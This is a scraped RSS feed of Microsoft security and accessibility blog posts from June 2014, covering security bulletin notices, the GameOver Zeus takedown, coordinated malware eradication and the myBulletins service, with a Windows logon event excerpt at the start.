ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x0</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Process Name:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>Network Information:</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Workstation Name:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Source Network Address:&nbsp;&nbsp;&nbsp; ::1</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Source Port:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 57514</p> <p>Detailed Authentication Information:</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logon Process:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WDIGEST</p> <p><span style="background-color:#ffff00;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Authentication Package:&nbsp;&nbsp;&nbsp;&nbsp; WDigest</span></p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Transited Services:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Package Name (NTLM only):&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Key Length:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0</p> <p><b>&nbsp;</b></p> <p><b>&nbsp;</b></p> <p><b>&nbsp;</b></p> <p><b>- Joe Bialek, MSRC Engineering</b></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632226&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1"> Regional Threat Assessments: New Interactive Capabilitieshttp://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspxThu, 05 Jun 2014 16:59:11 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:6b030a26-083c-426d-ae95-746337e1cf64Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632158http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632158http://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx#comments<p>If you follow our blog, then you are likely aware that we recently released Volume 16 of the Microsoft Security Intelligence Report.&nbsp; What you may not be aware of is that with this release, we overhauled the <a href="http://www.microsoft.com/security/sir/threat/default.aspx">Regional Threat Assessment </a>section of our website to give visitors a much more robust interactive digital experience. This blog post is intended to provide a summary of the enhancements that are now available. <a href="/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632158&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Regional Threat AssessmentsMicrosoft Security Intelligence ReportSIR Advance Notification Service for the June 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/06/05/advance-notification-service-for-the-june-2014-security-bulletin-release.aspxThu, 05 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:de6d16fe-84bd-46f3-a3b8-54ce6cc49476Dustin C. Childs0<p><span style="font-size:medium;">Today we provide </span><a href="http://technet.microsoft.com/security/bulletin/MS14-jun"><span style="color:#0563c1;font-size:medium;">advance notification</span></a><span style="font-size:medium;"> for the release of seven Bulletins, two rated Critical and five rated Important in severity. These Updates are for Microsoft Windows, Microsoft Office and Internet Explorer. The Update for Internet Explorer addresses </span><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1770"><span style="color:#0563c1;font-size:medium;">CVE-2014-1770</span></a><span style="font-size:medium;">, which we have not seen used in any active attacks.</span></p> <p><span style="font-size:medium;">Also, in case you missed it, last month we released <a href="https://technet.microsoft.com/library/security/2871997.aspx"><span style="color:#0563c1;">Security Advisory 2871997</span></a> to further enhance credentials management and protections on Windows 7, Windows 8, Windows Server 2008 R2, and Windows Server 2012. &nbsp;Since then, we have received some questions about the functionality changes introduced by the advisory. &nbsp;Over on the Security Research &amp; Defense (SRD) <a href="http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspx"><span style="color:#0563c1;">blog</span></a>, Joe Bailek from the MRSC Engineering team provides an overview of those changes, their impact and some other important configuration changes that can be made in conjunction with the update to further improve system security. &nbsp;I recommend you take a few moments to read the SRD blog and consider implementing some or all of the changes in your environment.</span></p> <p><span style="font-size:medium;">As always, we&rsquo;ve scheduled the Security Bulletin release for the second Tuesday of the month, June 10, 2014, at approximately 10:00 a.m. PDT. &nbsp;Revisit this blog then for analysis of the relative risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s Updates. &nbsp;Until then, please review the </span><a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-jun"><span style="color:#0563c1;font-size:medium;">ANS summary page</span></a><span style="font-size:medium;"> for more information to help you prepare for Security Bulletin testing and deployment.</span></p> <p><span style="font-size:medium;">Don&rsquo;t forget, you can also follow the MSRC team&rsquo;s recent activity on Twitter at </span><a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;font-size:medium;">@MSFTSecResponse</span></a><span style="font-size:medium;">.&nbsp;</span></p> <p><span style="font-family:Times New Roman;font-size:medium;"> </span><span style="font-size:medium;">Thank you, </span><br /><span style="font-size:medium;"> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><br /><span style="font-size:medium;"> Group Manager, Response Communications</span><br /><span style="font-size:medium;"> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632222&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Windowsmonthly bulletin releaseANSInternet Explorer (IE) Dasher Software Remains an Amazing Alternative to Traditional On-Screen Keyboardhttp://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspxThu, 05 Jun 2014 13:01:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530679Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10530679http://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspx#commentsThe following blog post was written by Erin Beneteau, a senior learning and development strategist for accessibility at Microsoft. Erin has worked in the field of assistive technology for over 15 years. ----- I remember watching the demonstrator...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530679" width="1" height="1"> Update on malware eradication "sandbox"http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/04/update-on-malware-eradication-quot-sandbox-quot.aspxWed, 04 Jun 2014 16:38:31 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:fff61095-9a23-4468-ad74-825b91462991Trusted Cloud Team0<p><strong>By TwC Staff</strong></p> <p>A couple months back, we wrote about plans to create a &ldquo;sandbox&rdquo; where antimalware industry experts and other security professionals can work together to <a target="_blank" href="/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">move beyond disrupting malware</a> to actually eradicating it. It&rsquo;s a lofty goal, and one that we believe can change the game.&nbsp; <a href="/b/trustworthycomputing/archive/2014/06/03/update-on-malware-eradication-quot-sandbox-quot.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/04/update-on-malware-eradication-quot-sandbox-quot.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632061&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1"> Coordinated malware eradication nears launchhttp://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-eradication-nears-launch.aspxWed, 04 Jun 2014 15:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3d28d70a-bdd3-4c25-ac4d-19e663cb63bfmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-eradication-nears-launch.aspx#comments<div class="ExternalClassEE3519C44964459D8058D695602641C8"> <p>​Good news: the <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx">coordinated malware eradication</a> preparations are almost done.&nbsp; We have held several roundtable meetings at industry events around the world, and <a href="#upcoming">the last two</a> are scheduled for June and July. We had insightful conversations with a diverse group of experts from across the antimalware industry. The ideas have converged into a shared vision of how we&rsquo;ll work together to put pressure on the malware ecosystem. I am excited for the first coordinated eradication campaigns to launch!</p> <p>Discussions have given the industry a place to talk about how coordination happens today. Data-sharing partnerships are becoming more common, and the resulting campaigns are paying off. As you might imagine, this has led some roundtable participants to ask us to explain why coordinated malware eradication is necessary.</p> <p>Our response is simple: We&rsquo;ve learned from experience that the amount of time and effort required just to plan, execute, and measure each antimalware campaign is daunting. Our roundtable discussions have shown that others are feeling this too. Coordinated malware eradication can reduce this drag on efficiency.</p> <p>I think the appeal of this drag reduction is why there&rsquo;s been such great engagement. We recently talked with the Asia-Pacific Computer Emergency Response Team (APCERT). APCERT is working to increase transparency and the use of common measurements through a project named Cyber Green.&nbsp; Like us, they believe that getting closer to malware eradication requires a wide range of individuals and organizations to get involved and work together.</p> <p>Yurie Ito, Chair of the Steering Committee for APCERT said, &ldquo;What we have been discussing around coordinated malware eradication is very complimentary to the driving concepts behind Cyber Green. There are huge benefits to working together to increase visibility into the sources and presence of cyber risks.&nbsp; Fix this, and we go a long way to making the Internet a stronger, more resilient and safer place.&rdquo;</p> <p>Here&rsquo;s a short list of areas that we&rsquo;ve heard cause the most drag on antimalware campaign efficiency:</p> <ul> <li><strong>Incomplete contact lists:</strong> There is no simple and commonly available way to find, and then reach, the right person inside each of our organizations.&nbsp;</li> <li><strong>Missing patterns:</strong> We lack standard recipes and templates for running eradication campaigns, and find ourselves rebuilding these from the ground up each time.</li> <li><strong>Incomplete measurements:</strong> We each struggle to calculate and track the damage caused by malware, and the impact our eradication efforts make.</li> </ul> <p>What we want to do through coordinated malware eradication is solve these on-going challenges, which should help unleash our industry to focus its efforts on eradication.</p> <p>From our roundtable discussions, an outline is taking shape. Here&rsquo;s how we&rsquo;re thinking about the campaign process. One or more members set an eradication goal, and then they invite others to join them in a campaign. Interested members opt-in and specify their level of commitment. Now formed, the group chooses a leader and begins planning.</p> <p>Once the group defines tactics and metrics, the execution phase begins. See details about this step <a href="http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">in my last blog</a>.&nbsp; The short version: a coordinated malware eradication sandbox can help correlate information from all campaign participants, allowing the group to not only measure and correlate better, but precisely target the bad actors&rsquo; weak spots.</p> <p>Having a clear ending for each campaign helps keep the cycles short and the participants focused and motivated. Once the campaign ends and we celebrate another malware eradication, we have an opportunity to review the results and discuss future improvements to the process.&nbsp; At this point, some members might choose to talk publicly about the results and their contribution.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CMEgraphic2.png"><img width="500" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/CMEgraphic2.png" border="0" /></a></p> <span> <em>Figure 1: An outline of the malware eradication campaign process under discussion</em></span> <p>There has been strong interest in this campaign process and we&rsquo;ll soon host a set of pilot campaigns with current and prospective members of <a href="http://www.microsoft.com/security/Portal/mmpc/via/virus-information-alliance.aspx">Virus Information Alliance</a> (VIA) program.&nbsp; It will be great to be able to eradicate some malware as we learn from what works. In the meantime, we welcome your feedback. The more engagement the better!</p> <p><em>Dennis Batchelder</em><br /><em>Partner PM Manager </em><br /><em>MMPC</em></p> <p><strong><a id="upcoming"></a>Upcoming engagement options</strong></p> <ul> <li>26th Annual FIRST Conference, June 22, 2014 &ndash; June 27, 2014 Boston, Massachusetts, USA.</li> <li>Microsoft Security Research Alliance Summit, July 22, 2014 &ndash; July 24, 2014 Seattle, Washington, USA.</li> </ul> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632064&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> A Blind Accessibility Engineer Switches from a Mac System to Microsoft Windowshttp://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspxTue, 03 Jun 2014 21:01:27 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530678Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10530678http://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspx#commentsAfter five years with a Mac-based system, a veteran of the accessible technology industry switched back to Windows. Marco, who has been blind his entire life and uses screen readers, made the move, in part, because his Apple system didn&rsquo;t have steady...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530678" width="1" height="1"> The University’s Role in Addressing the Future of Cybersecurityhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/03/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspxTue, 03 Jun 2014 15:18:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ef2f2a84-6e5a-49b4-ad52-bac7743ea9aaTrusted Cloud Team0<p><strong>By Scott Charney, Corporate Vice President, Trustworthy Computing</strong><br /><br />In the past few years, I have visited a number of universities to address multi-disciplinary audiences on the challenges of cyber security and privacy.&nbsp; Most recently, I visited both the University of Washington and Stanford University, the former to teach a course on cybersecurity and cybercrime; the latter to connect with students and faculty on security, privacy, and big data. <a href="/b/trustworthycomputing/archive/2014/05/30/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/03/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631844&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">threat landscapeSTEMcyber threatsscott charneyTrustTechnologyCybersecurityExpert OpinionsSecurity ResearchSecurityresearchcyber securityTrustworthy ComputingMicrosoftsecurity community Help dad with privacy and security this Father’s Dayhttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/02/help-dom-with-privacy-and-security-this-father-s-day.aspxMon, 02 Jun 2014 19:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530322Eve Blakemore6http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10530322http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/02/help-dom-with-privacy-and-security-this-father-s-day.aspx#comments<p>If you want to give your dad something really useful this Father&rsquo;s Day (June 15), help him tune up his PC and give him a few tips on how to increase his privacy and security online.</p> <h1>Get smart about passwords</h1> <p>Strong passwords help protect you against hackers and other cybercriminals. But even if your dad uses long combinations of letters, numbers, and other special characters to protect his email password or other online accounts, he could still be vulnerable if he doesn&rsquo;t follow this guidance:</p> <ul> <li>Use different passwords for different accounts.</li> <li>Change your passwords often.</li> <li>Don&rsquo;t share your passwords with anyone.</li> <li>Don&rsquo;t send passwords or user names over email.</li> </ul> <p>For more information on how to use passwords to increase your safety, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/passwords-create.aspx">Create strong passwords</a>&nbsp;and <a href="http://www.microsoft.com/security/pc-security/protect-passwords.aspx">Protect your passwords</a>.</p> <h1>Learn to recognize scams</h1> <p>If your dad uses email, text messaging, or social networking websites, he&rsquo;s probably encountered scams. If he knows the signs of a scam, he&rsquo;s less likely to fall for them.</p> <p><strong>Scams can contain the following:</strong></p> <ul> <li>Random links that appear to come from someone in your contact list</li> <li>Alarmist messages and threats of account closures</li> <li>Promises of money for little or no effort</li> <li>Deals that sound too good to be true</li> <li>Requests to donate to a charitable organization after a disaster that has been in the news</li> <li>Bad grammar and misspellings</li> </ul> <p>For more information, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">How to recognize phishing email messages, links, or phone calls</a>.</p> <h1>Get security updates automatically</h1> <p>One of the best ways to protect your dad from Internet threats is by making sure he&rsquo;s getting all the latest security updates for his operating system and other software.</p> <p>Microsoft releases&nbsp;<a href="http://www.microsoft.com/security/pc-security/updates-faq.aspx">security updates</a>&nbsp;on the second Tuesday of every month. Open&nbsp;<a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Windows Update</a>&nbsp;to confirm that your dad has automatic updating turned on and that he's downloaded and installed all the latest critical and security updates.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn more about how to get security updates automatically</a></p> <p>If your dad still uses Windows XP, he&rsquo;s no longer receiving security updates. Encourage him to upgrade his operating system or buy a new PC.&nbsp;<a href="http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.67770000/offerID.42494569909?siteID=Emv4RLEHREc-zzWiHukG3X4YHaoVYBzXZQ#shop-computers&amp;siteID=Emv4RLEHREc-auRvW0feiBW8W8bQaqaCSg">You or your dad might be able to save $100 on a new computer today.</a></p> <p>&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530322" width="1" height="1">securityFather's Day Microsoft Digital Crimes Unit Partners with FBI to Fight Zeus Malwarehttp://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspxMon, 02 Jun 2014 17:04:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3bc59749-5f8f-439e-b5bb-1fa6f00fc931Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3631886http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3631886http://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspx#comments<p>Today the FBI announced the disruption of GameOver Zeus, a variant of the infamous Zeus family of malware. As part of this action, Microsoft&rsquo;s <a href="/b/microsoft_blog/archive/2014/06/02/microsoft-helps-fbi-in-gameover-zeus-botnet-cleanup.aspx">Digital Crimes Unit </a>worked with&nbsp;the FBI and industry partners to remove the malware so that infected computers can no longer be used for harm. Zeus, also known as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fZbot">Win32/Zbot</a>, is a family of trojans that is designed to steal personal and financial information, give attackers access and control of compromised systems, and has been used to spread ransomware.</p> <p>You can get all the details of this effort right from the <a href="/b/microsoft_blog/archive/2014/06/02/microsoft-helps-fbi-in-gameover-zeus-botnet-cleanup.aspx">Microsoft Digital Crimes Unit</a>.</p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631886&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">ZeusDigital Crimes UnitGameOver ZeusWin32/ZbotDCUZbot Cyberspace 2025: Today's Decisions, Tomorrow's Terrainhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/02/envisioning-cyberspace-in-2025.aspxMon, 02 Jun 2014 15:52:19 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5bed5558-3f5d-4d80-8918-cae0a524d033Trusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>What does the future look like?&nbsp; To take a closer look, Microsoft has released a report called &ldquo;<a target="_blank" href="http://download.microsoft.com/download/C/7/7/C7775937-748E-4E95-85FB-24581F16B588/Cyberspace%202025%20Today%E2%80%99s%20Decisions,%20Tomorrow%E2%80%99s%20Terrain.pdf">Cyberspace 2025: Today&rsquo;s Decisions, Tomorrow&rsquo;s Terrain</a>.&rdquo;&nbsp; How will the choices organizations make at present, affect their ability to shape the social, economic and demographic changes a decade from now?&nbsp;&nbsp;<a target="_blank" href="/b/trustworthycomputing/archive/2014/05/30/envisioning-cyberspace-in-2025.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/02/envisioning-cyberspace-in-2025.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631846&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicescloud securitythreat landscapeAdrienne HallCloudcyber threatstrusted online experiencescybernormsTrustITTechnologyCybersecuritySecurityresearchcyber securitysafeTrustworthy ComputingMicrosoftPrivacy It’s time to install Windows 8.1http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/29/it-s-time-to-install-windows-8-1.aspxThu, 29 May 2014 17:27:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10528811Eve Blakemore32http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10528811http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/29/it-s-time-to-install-windows-8-1.aspx#comments<p>If your computer is running Windows 8, it&rsquo;s time to download and install the newest version&mdash;Windows 8.1.</p> <p>Windows&nbsp;8.1 Update&nbsp;(also known as&nbsp;KB 2919355) helps your computer run at optimal performance and includes new features that make the operating system easier to use. If you don&rsquo;t install Windows 8.1, or if you uninstall it, you might not get future bug fixes, security updates, and new features.</p> <p>If your computer is set to <a href="http://www.microsoft.com/security/pc-security/updates.aspx">receive updates automatically</a>, you don&rsquo;t need to do anything.</p> <p>To see if you&rsquo;re running the latest update, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows/which-operating-system">Which Windows operating system am I running?</a>&nbsp;To install the latest update, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows-8/install-latest-update-windows-8-1">Install the latest Windows 8.1 Update</a>.&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10528811" width="1" height="1">Windows 8Windows 8.1 New “myBulletins” Online Service: Delivering Security Bulletins, Tailored for your Organizationhttp://blogs.technet.com/b/security/archive/2014/05/28/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspxWed, 28 May 2014 16:04:43 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5cb93679-15ff-4f59-8230-013a3eacc62cTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3628029http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3628029http://blogs.technet.com/b/security/archive/2014/05/28/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx#comments<p>If you&rsquo;re an IT Professional then you know it can be challenging to keep all of the applications running in your environment up to date, especially with the rapid growth of applications coming online and the consumerization of IT.&nbsp; Despite the challenges, running up-to-date software is a critical part of a holistic security strategy that protects against cybercriminal activity that can lead to data loss, financial theft, public defacement, etc.&nbsp; To help make the security update assessment and deployment process easier for organizations, in 2003 we started &ldquo;Update Tuesday,&rdquo; a predictable cycle in which security updates for Microsoft products and services are provided to customers on the second Tuesday of each month.&nbsp; The feedback by customers to date has been extremely favorable &ndash; as this predictable monthly cycle has helped them plan and resource their security update deployments in a more structured and predictable way</p> <p><a href="/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-50-43/4.jpg"></a>Today I am pleased to share we have taken our security update process one step further with the release of &ldquo;<a href="http://mybulletins.technet.microsoft.com/">myBulletins</a>.&rdquo;&nbsp;&nbsp;&nbsp;<a href="/b/security/archive/2014/05/01/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/28/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628029&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Security BulletinsMicrosoft Security Response CentermyBulletins Meet myBulletins: an online security bulletin customization servicehttp://blogs.technet.com/b/msrc/archive/2014/05/28/meet-mybulletins-an-online-security-bulletin-customization-service.aspxWed, 28 May 2014 15:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:20d48b6e-9483-432f-983e-3a85ab79ccc2MSRC Team0<p><span style="font-size:small;">Microsoft is committed to promoting a safer, more trusted Internet and providing monthly security updates is one of the ways our customers keep their devices and connections to the Internet more secure. Packaging updates together into a monthly bulletin cycle stems from customer feedback and offers a predictable way to help protect them against newly discovered threats. </span></p> <p><span style="font-size:small;">Today, we are excited to introduce </span><a href="http://mybulletins.technet.microsoft.com/"><span style="color:#0563c1;font-size:small;">myBulletins</span></a><span style="font-size:small;">, a new online security bulletin customization service. </span></p> <p><span style="font-size:small;">We&rsquo;ve also created myBulletins based on your feedback. It&rsquo;s a customizable online service that offers IT professionals a personalized list of the Microsoft security bulletins that matter most to their organization. It is easy to use: simply visit </span><a href="http://mybulletins.technet.microsoft.com/"><span style="color:#0563c1;font-size:small;">myBulletins</span></a><span style="font-size:small;">, log in to your Microsoft account, select the products and versions running in your environment, and a customized list of only those security bulletins is displayed.</span></p> <p><span style="font-size:small;">To develop myBulletins, we asked if there was anything we could do differently to make applying security bulletins easier. We recognize that not all of the products covered in the monthly security bulletins may be operating in your environment. You shared that you needed the ability to cut through complexity and make decisions quickly. You wanted help identifying the information that is most relevant to your organization. We heard you and acted on your feedback. </span></p> <p><span style="font-size:small;">Starting today, myBulletins will enable you to quickly find security bulletins using advanced search and filtering options. The online service prioritizes security bulletin deployment by release date, severity, and reboot requirements to aid in decision making. The service provides a dynamic list in a customizable dashboard that can be edited at any time, as well as downloaded to a Microsoft Excel report. </span></p> <p><span style="font-size:small;">myBulletins is our way to deliver on the promise to make applying security updates as seamless as possible.</span></p> <p><span style="font-size:small;">There are three simple steps to get started: </span></p> <ul> <li> <p>Step 1: Visit <a href="http://mybulletins.technet.microsoft.com/"><span style="color:#0563c1;">myBulletins</span></a> and sign-in with your Microsoft account</p> </li> <li> <p>Step 2: Build your profile by selecting the Microsoft products you want to see in your dashboard</p> </li> <li> <p>Step 3: View your personalized dashboard</p> </li> </ul> <p><span style="font-size:small;">We know that customers are best protected when <span style="text-decoration:underline;">all</span> applicable updates are applied, which is why we think you should create a profile, use it, and let us know what you think by using the </span><a href="https://lab.msdn.microsoft.com/mailform/contactus.aspx?refurl=http%3a%2f%2ftechnet.microsoft.com%2fen-us%2fsecurity%2fbb291012.aspx&amp;loc=en-us"><span style="color:#0563c1;font-size:small;">site feedback</span></a><span style="font-size:small;"> link. Our ears are open and we look forward to hearing about your myBulletins experience.</span></p> <p><span style="font-size:small;">Tracey Pretorius<br /></span>Director, Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3631594&AppID=4571&AppType=Weblog&ContentType=0" 